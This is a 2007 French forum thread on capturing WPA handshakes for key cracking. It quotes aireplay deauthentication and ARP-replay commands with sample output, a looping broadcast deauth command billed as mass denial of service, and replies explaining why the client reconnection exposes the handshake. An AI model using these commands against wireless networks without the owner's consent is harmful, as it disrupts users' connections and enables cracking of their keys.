Quelqu'un a une technique fiable pour choper un handshake? (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-05-2007 13:29:28

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Quelqu'un a une technique fiable pour choper un handshake?

Je galère pour choper un handshake. Le seul que j'ai eu c'est un handshake de freebox-hd, je crois que c'est un boitier télé sad .
J'ai essayé pas mal d'attaques par déauth:
(les commandes ci dessous ont aussi été testées avec aireplay-ng sous BT2)

-Désautentification du client pour choper un handshake
aireplay -0 5 -a "macAP" -c "macSTATION" ath0 (déauth/ lecture packets) ou:
aireplay -0 1 -a "macAP" -c "macSTATION" ath0 (déauth forcée) ou:
aireplay -3 1 -a "macAP" -c "macSTATION" ath0 (à essayer) ou:
aireplay -0 -3 -a "macAP" -c "macSTATION" ath0 (à essayer)

et

Capture WPA handshakes by forcing clients to reauthenticate. It can also be used to generate ARP requests as Windows clients sometimes flush their ARP cache when disconnected. This attack is totally useless if there are no associated wireless clients.

1. WPA Handshake capture

# aireplay -0 5 -a 00:A0:B0:40:5C:84 -c 00:04:23:52:80:41 eth0
00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]
00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]
00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]
00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]
00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]

2. ARP request generation (optional) if above does not work.

# aireplay -0 10 -a 00:A0:B0:40:5C:84 eth0
# aireplay -3 -b 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0

After sending the five deauthentication packets, it starts listening for APR requests with attack 3. The -h option is necessary and must be the MAC address of an associated client.
3. Mass denial-of-service (MDOS) attack

# aireplay -0 0 -a 00:A0:B0:40:5C:84 eth0

With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus preventing clients from staying connected.


what you want to do is force deauth's and then in another terminal window, associate. don't deauth forever - just send 5 or so. sometimes the deauth's take a while so be patient.

Parallèlement à la déauth j'ai essayé de m'associer pour voir si ça donnait quelque chose. Bilan: que dalle.
Je sais que l'encryption doit etre en TKIP pour choper le handshake, mais je ne chope toujours rien.
J'aurais aimé avoir le témoignage de quelqu'un qui a réussi à générer un handshake afin de mieux comprendre. Quels sont les parametres nécessaires? Un bon power, un client présent? Meme avec des clients présents mes déauth n'ont rien donné... hmm


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-05-2007 14:09:06

OxyDe
Membre d'honneur
Lieu : L'île avec 2 ailes
Inscription : 16-01-2007
Messages : 344

Re : Quelqu'un a une technique fiable pour choper un handshake?

Connecte un PC en wifi sur TA borne wifi en WPA, et teste comment fonctionne la désauthentification. Tu comprendras beaucoup de choses, notamment à quoi sert le paramètre juste après le -0 wink
Essaye par toi même et si tu comprend toujours pas je t'expliquerai.


L'eau ça rouille

Hors Ligne

#3 05-05-2007 14:34:55

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Quelqu'un a une technique fiable pour choper un handshake?

Je n'ai malheureusement pas 2 ordis pour tester par moi meme. J'ai bien essayé sous vmware, avec la session connectée via pcmcia sous windows et la session virtuelle sous BT2 en monitor via l'usb, mais la machine virtuelle a fortement tendance a bugger. Airodump marche nickel, mais quand je lance un aireplay ça bug à fond et ça me stoppe airodump. Donc je ne peux pas me rendre compte du fonctionnement de la déshautentification par moi meme, à moins d'avoir un autre ordi sous la main. Si tu veux bien me faire profiter de tes connaissances ça m'aiderait beucoup à comprendre. Car en effet c'est bien beau de balancer des aireplay -0 5, mais qu'est ce qui se passe exactement à ce moment là? J'aimerais bien comprendre.


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#4 05-05-2007 15:10:26

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : Quelqu'un a une technique fiable pour choper un handshake?

Quand tu envoie une attaque -0 5 ça va envoyer 5 fois le signal de deauth (deauthetification) à la station qui va alors se deconnecter mais puisque que normalement sous windows la connexion est automatique elle va chercher à se reconnecter immédiatement et c'est lors de la connexion que tu vas choper le handshake (il faut bien se mettre sur le channel de l'AP voir meme le paramètre --bssid ...... là tu met la mac de l'ap comme ça tu ne capte que les données échnagéespar cette ap)

Sous airodump normalement quand tu envoie l'attaque -0 tu vois que les données arretent d'augmenter et tu as la colonne lost (au niveau de la station qui s'emballe) jusqu'à ce que la station se reconnecte.
Pour etre sur moi je met -0 10.

PS: sur les livebox c'est au petit bonheur la chance pour recuperer le handshake.

Hors Ligne

#5 05-05-2007 15:37:25

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Quelqu'un a une technique fiable pour choper un handshake?

Ok donc il faut déja avoir une station qu'on capte bien. Donc si j'envoie des déauth dans le vent, c'est probablement que la station ne capte pas mes paquets de déauth. C'est ce que je pensais mais là je comprend un peu mieux. Merci smile


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#6 05-05-2007 16:00:46

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : Quelqu'un a une technique fiable pour choper un handshake?

Il y a des chances que ce soit ça.

Hors Ligne

#7 05-05-2007 22:09:45

OxyDe
Membre d'honneur
Lieu : L'île avec 2 ailes
Inscription : 16-01-2007
Messages : 344

Re : Quelqu'un a une technique fiable pour choper un handshake?

Je plussois sur toute la ligne smile


L'eau ça rouille

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
1 1273 25-03-2012 15:00:34 par Nicolastuto
0 1461 18-11-2011 21:05:48 par Tutorialgratuit
1 2753 29-01-2011 09:12:37 par zorxos
0 2781 15-09-2010 23:27:41 par matthieu115
0 2005 18-08-2010 23:44:32 par mixilou